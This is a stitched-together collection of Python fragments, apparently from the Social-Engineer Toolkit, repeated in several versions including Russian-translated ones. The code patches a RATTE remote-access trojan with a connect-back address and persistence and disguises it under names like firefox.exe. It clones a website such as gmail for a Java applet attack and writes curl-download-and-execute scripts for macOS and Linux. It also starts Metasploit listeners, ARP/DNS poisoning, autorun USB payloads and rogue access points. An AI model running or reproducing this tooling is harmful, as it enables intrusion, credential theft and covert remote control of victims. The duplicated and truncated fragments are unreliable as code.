def prepare_ratte(ipaddr, ratteport, persistent, customexe): core.print_info("preparing RATTE...") # replace ipaddress with one that we need for reverse connection back ############ # Load content of RATTE ############ with open("src/payloads/ratte/ratte.binary", "rb") as fileopen: data = fileopen.read() ############ # PATCH Server IP into RATTE ############ with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" pers = (len(str(persistent)) + 1) * "Z" # check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!) if customexe: cexe = (len(str(customexe)) + 1) * "Q" else: cexe = "" filewrite.write( data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace( host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
def update_config(): init_file = file("%s/config/set_config" % (definepath), "r") new_config = file("%s/config/set_config.py" % (definepath), "w") timestamp = str(datetime.datetime.now()) new_config.write( """#!/usr/bin/python\n ####################################################################### ## DO NOT MODIFY THIS FILE ## ####################################################################### # This file is generated by a routine inside SET, for use by SET. # # # # Settings should be modified in the set_config file, and then # # SET updated using the 'Update SET Configuration' menu item in # # the main menu. This file will be updated with the new settings. # # # # set_config.py generated: """ + timestamp + """ # # # ####################################################################### CONFIG_DATE='""" + timestamp + """'\n""" ) for line in init_file: if not line.startswith("#"): line = line.rstrip() line = line.split("=") setting = line[0] value = line[1] if value == "ON": value = "True" elif value == "OFF": value = "False" else: pass quoted = value_type(setting) if quoted: new_config.write(setting + '="' + value + '"\n') else: new_config.write(setting + "=" + value + "\n") init_file.close() new_config.close() sleep(1) from set_config import CONFIG_DATE as verify print_info("New set_config.py file generated on: %s" % timestamp) print_info("Verifying configuration update...") if verify == timestamp: print_status("Update verified, config timestamp is: %s" % timestamp) else: print_error("Update failed? Timestamp on config file is: %s" % verify) print_status("SET is using the new config, no need to restart")
def update_config(): if not os.path.isdir("/etc/setoolkit"): os.makedirs("/etc/setoolkit") init_file = open("/etc/setoolkit/set.config", "r") new_config = open("/etc/setoolkit/set_config.py", "w") timestamp = str(datetime.datetime.now()) new_config.write("""#!/usr/bin/python\n ####################################################################### ## DO NOT MODIFY THIS FILE ## ####################################################################### # This file is generated by a routine inside SET, for use by SET. # # # # Settings should be modified in the set.config file, and then # # SET updated using the 'Update SET Configuration' menu item in # # the main menu. This file will be updated with the new settings. # # # # set.config.py generated: """ + timestamp + """ # # # ####################################################################### CONFIG_DATE='""" + timestamp + """'\n""") for line in init_file: try: if not line.startswith("#"): line = line.rstrip() line = line.split("=") setting = line[0] value = line[1] if value == "ON": value = "True" elif value == "OFF": value = "False" else: pass quoted = value_type(setting) if quoted: new_config.write(setting + '="' + value + '"\n') else: new_config.write(setting + '=' + value + '\n') except: pass init_file.close() new_config.close() sleep(1) sys.path.append("/etc/setoolkit") from set_config import CONFIG_DATE as verify print_info("New set.config.py file generated on: %s" % timestamp) print_info("Verifying configuration update...") if verify == timestamp: print_status("Update verified, config timestamp is: %s" % timestamp) else: print_error("Update failed? Timestamp on config file is: %s" % verify) print_status("SET is using the new config, no need to restart")
def start_web_server_tw(directory,port): global httpd try: # import the threading, socketserver, and simplehttpserver import thread,SocketServer,SimpleHTTPServer # create the httpd handler for the simplehttpserver # we set the allow_reuse_address incase something hangs can still bind to port class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True # specify the httpd service on 0.0.0.0 (all interfaces) on port 80 httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler) # thread this mofo thread.start_new_thread(httpd.serve_forever,()) # change directory to the path we specify for output path os.chdir(directory) # handle keyboard interrupts except KeyboardInterrupt: core.print_info("Exiting the SET web server...") httpd.socket.close()
def start_web_server_tw(directory, port): global httpd try: # create the httpd handler for the simplehttpserver # we set the allow_reuse_address in case something hangs can still bind to port class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address = True # specify the httpd service on 0.0.0.0 (all interfaces) on port 80 httpd = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler) # thread this mofo thread.start_new_thread(httpd.serve_forever, ()) # change directory to the path we specify for output path os.chdir(directory) # handle keyboard interrupts except KeyboardInterrupt: core.print_info("Выход из веб-сервера SET...") httpd.socket.close()
def prepare_ratte(ipaddr, ratteport, persistent, customexe): core.print_info("preparing RATTE...") # replace ipaddress with one that we need for reverse connection back ############ # Load content of RATTE ############ with open("src/payloads/ratte/ratte.binary", "rb") as fileopen: data = fileopen.read() ############ # PATCH Server IP into RATTE ############ with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" pers = (len(str(persistent)) + 1) * "Z" # check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!) if customexe: cexe = (len(str(customexe)) + 1) * "Q" else: cexe = "" filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
print(core.bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""") web_server_start() # if we are using ettercap if os.path.isfile(os.path.join(core.setdir, "ettercap")): with open(os.path.join(core.setdir, "ettercap")) as fileopen5: for line in fileopen5: ettercap = line.rstrip() # run in background ettercap += " &" # spawn ettercap or dsniff subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory if os.path.isfile(os.path.join(core.setdir, "meta_config")): core.print_info("Launching MSF Listener...") core.print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower() if automatic_listener != "off": # specify if we are using the multi pyinjector meta_config = "meta_config" if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config))) # check if we want to deliver emails or track users that click the # link webattack_email = core.check_config("WEBATTACK_EMAIL=").lower() if webattack_email == "on" or track_email == "on":
# core upx pass #setcore.upx("src/program_junk/msf.exe") if os.path.isfile("src/program_junk/web_clone/msf.exe"): os.remove("src/program_junk/web_clone/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe") if payload_selection == "SETSHELL": if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)): os.remove("%s/src/program_junk/web_clone/x" % (definepath)) shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath)) # if we are targetting nix if posix == True: setcore.print_info("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = setcore.generate_random_string(10,10) downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2]) filewrite.write(downloader) filewrite.close() # grab nix binary name linux_name = setcore.generate_random_string(10,10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2]) filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w") filewrite.write(downloader) filewrite.close() shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name)) shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input( core.setprompt(["9", "2"], "Введите IP-адрес для подключения")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nМожет быть, вы неправильно написали адрес?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int( input( core.setprompt( ["9", "2"], "Порт RATTE Server должен прослушивать [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( input( core.setprompt( ["9", "2"], "Введите порт RATTE Сервер должен прослушивать [8080]") )) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input( core.setprompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input( core.setprompt([ "9", "2" ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?" )) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Полезная нагрузка была экспортирована в %s" % os.path.join(core.userconfigpath, "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input( core.setprompt(["9", "2"], "Запустите слушатель ratteserver сейчас [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Старт ратсервер...") ratte_listener_start(ratteport) core.print_info("Остановка ратсервера...") sleep(2) valid_response = True else: core.print_warning( "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
elif trigger == 3: payload = "openthis.wab" else: payload = "" filewrite.write( """[autorun]\nopen={0}\nicon=autorun.ico""".format(payload)) core.print_status( "Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'" ) core.print_status( "Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed." ) core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") # if we want to launch payload and automatically create listener if trigger in [1, 2, 3]: choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]") if choice1.lower() == "yes" or choice1.lower() == "y": # if we used something to create other than solo.py then write out the # listener if not os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ open(os.path.join(core.setdir, "payload.options")) as fileopen: for line in fileopen: line = line.split(" ") filewrite.write("use multi/handler\n") filewrite.write("set payload {0}\n".format(line[0])) filewrite.write("set lhost {0}\n".format(line[1]))
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]"))) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) core.print_info("Stopping ratteserver...") sleep(2) valid_response = True else: core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
if prompt == "yes" or prompt == "y": # prompt the user to import the code signing certificate cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)")) if not os.path.isfile(cert_path): # loop forever while True: core.print_error("ERROR:Filename not found. Try again.") # re-prompt if we didn't file the filename cert_path = input(core.setprompt("0", "Path to the .cer certificate file")) # if we find the filename then break out of loop if os.path.isfile(cert_path): break # here is where we import the certificate try: core.print_info("Importing the certificate into SET...") subprocess.Popen("keytool -import -alias MyCert -file {}".format(cert_path), shell=True).wait() # trigger that we have our certificate already and bypass the # request process below use_flag = 1 # exception here in case it was already imported before except: pass # this will exit the menu if prompt == "quit" or prompt == "q": use_flag = 0 prompt = "yes" cert_path = ""
def main(): valid_site = False valid_ip = False valid_response = False input_counter = 0 ################# # get User Input ################# # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on")) while valid_ip != True and input_counter < 3: ipaddr = input( core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error( "\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 # try: # ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on"))) # while ratteport==0 or ratteport > 65535: # print_warning('Port must not be equal to javaport!') # ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on"))) # except ValueError: # ratteport=8080 try: ratteport = int( input( core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == 0 or ratteport > 65535: if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int( input( core.setprompt( ["9", "2"], "Enter port RATTE Server should listen on [8080]"))) except ValueError: # core.print_info("Port set to default of 8080") ratteport = 8080 # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # if persistent == 'no' or persistent == '' or persistent == 'n': # persistent='NO' # else: # persistent='YES' while not valid_response: persistent = input( core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) persistent = str.lower(persistent) if persistent == "no" or persistent == "n": persistent = "NO" valid_response = True elif persistent == "yes" or persistent == "y": persistent = "YES" valid_response = True else: core.print_warning(text.YES_NO_RESPONSES) valid_response = False customexe = input( core.setprompt([ "9", "2" ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ############ # prepare RATTE ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe")) ################### # start ratteserver ################### # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) # if prompt == "yes" or prompt == "" or prompt == "y": # print_info("Starting ratteserver...") # ratte_listener_start(ratteport) while not valid_response: prompt = input( core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")) prompt = str.lower(prompt) if prompt == "no" or prompt == "n": # prompt = "NO" core.print_error("Aborting...") sleep(2) valid_response = True elif prompt == "yes" or prompt == "y": core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) core.print_info("Stopping ratteserver...") sleep(2) valid_response = True else: core.print_warning( "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main(): valid_site = False valid_ip = False # valid_persistence = False input_counter = 0 site_input_counter = 0 ipaddr = None website = None # pause=input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while not valid_site and site_input_counter < 3: website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?") site_input_counter += 1 # core.DebugInfo("site.scheme is: %s " % site.scheme) # core.DebugInfo("site.netloc is: %s " % site.netloc) # core.DebugInfo("site.path is: %s " % site.path) # core.DebugInfo("site.params are: %s " % site.params) # core.DebugInfo("site.query is: %s " % site.query) # core.DebugInfo("site.fragment is: %s " % site.fragment) while not valid_ip and input_counter < 3: ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: input_counter += 1 # javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) except ValueError: # core.print_info("Port set to default of 80") javaport = 80 try: ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Порт не должен быть равен javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? ")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr, ratteport, persistent, customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Запуск атаки Java-апплета..") java_applet_attack_tw(website, javaport, "reports/", ipaddr) with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen: for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Стартовый ратсервер...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
def prep_website(): print_info("This feature is currently under development and disabled.") return_continue()
os.remove("src/program_junk/web_clone/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe") if payload_selection == "SETSHELL": if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)): os.remove("%s/src/program_junk/web_clone/x" % (definepath)) shutil.copyfile( "%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath)) # if we are targetting nix if posix == True: setcore.print_info( "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload..." ) filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = setcore.generate_random_string(10, 10) downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], osx_name, osx_name, osx_name, payload_flags[1], payload_flags[2]) filewrite.write(downloader) filewrite.close() # grab nix binary name linux_name = setcore.generate_random_string(10, 10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
# if we are using ettercap if os.path.isfile(os.path.join(core.setdir, "ettercap")): with open(os.path.join(core.setdir, "ettercap")) as fileopen5: for line in fileopen5: ettercap = line.rstrip() # run in background ettercap += " &" # spawn ettercap or dsniff subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory if os.path.isfile(os.path.join(core.setdir, "meta_config")): core.print_info("Launching MSF Listener...") core.print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower() if automatic_listener != "off": # specify if we are using the multi pyinjector meta_config = "meta_config" if os.path.isfile( os.path.join(core.setdir, "meta_config_multipyinjector")): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format( os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config))) # check if we want to deliver emails or track users that click the
except: pass if not os.path.isfile("/etc/init.d/isc-dhcp-server"): core.print_warning("isc-dhcp-server does not appear to be installed.") core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.") if not os.path.isfile(dnsspoof_path): if os.path.isfile("/usr/sbin/dnsspoof"): dnsspoof_path = "/usr/sbin/dnsspoof" else: core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....") core.exit_set() if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" core.print_info("using SET's local airbase-ng binary") core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.") core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""") print("") core.print_status("SET will now launch nano to edit the file.") core.print_status("Press ^X to exit nano and don't forget to save the updated file!") core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!") core.return_continue() subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait() # DHCP SERVER CONFIG HERE dhcp_config1 = (""" ddns-update-style none; authoritative; log-facility local7;
core.print_warning("isc-dhcp-server does not appear to be installed.") core.print_warning( "apt-get install isc-dhcp-server to install it. Things may fail now.") if not os.path.isfile(dnsspoof_path): if os.path.isfile("/usr/sbin/dnsspoof"): dnsspoof_path = "/usr/sbin/dnsspoof" else: core.print_warning( "DNSSpoof was not found. Please install or correct path in set_config. Exiting...." ) core.exit_set() if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" core.print_info("using SET's local airbase-ng binary") core.print_info( "For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface." ) core.print_info( """This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""" ) print("") core.print_status("SET will now launch nano to edit the file.") core.print_status( "Press ^X to exit nano and don't forget to save the updated file!") core.print_warning( "If you receive an empty file in nano, please check the path of your isc-dhcp-server file!" ) core.return_continue()
def prep_website(): print_info("This feature is currently under development and disabled.") return_continue()
def main(): valid_site = False valid_ip = False valid_persistence = False input_counter= 0 site_input_counter=0 #pause=raw_input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while valid_site != True and site_input_counter < 3: website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse.urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("I can't determine the fqdn or IP of the site. Try again?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: core.print_warning("I couldn't determine whether this is an http or https site. Try again?") site_input_counter +=1 #core.DebugInfo("site.scheme is: %s " % site.scheme) #core.DebugInfo("site.netloc is: %s " % site.netloc) #core.DebugInfo("site.path is: %s " % site.path) #core.DebugInfo("site.params are: %s " % site.params) #core.DebugInfo("site.query is: %s " % site.query) #core.DebugInfo("site.fragment is: %s " % site.fragment) while valid_ip != True and input_counter < 3: ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 #javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]"))) except ValueError: #core.print_info("Port set to default of 80") javaport = 80 #javaport=80 try: ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Port must not be equal to javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr,ratteport,persistent,customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Starting java applet attack...") java_applet_attack_tw(website,javaport, "reports/",ipaddr) fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r") for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
definepath=os.getcwd() # grab config file config=file("config/set_config", "r").readlines() # grab our default directory cwd=os.getcwd() # set a variable as default to n or no ettercapchoice= 'n' # add dsniffchoice dsniffchoice = 'n' for line in config: # check for ettercap choice here match1=re.search("ETTERCAP=ON",line) if match1: setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC) ettercapchoice='y' # check for dsniff choice here match2=re.search("DSNIFF=ON", line) if match2: setcore.print_info("DSNIFF DNS Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC) dsniffchoice = 'y' ettercapchoice = 'n' # GRAB CONFIG from SET fileopen=file("config/set_config", "r").readlines() for line in fileopen: # grab the ettercap interface match=re.search("ETTERCAP_INTERFACE=", line) if match:
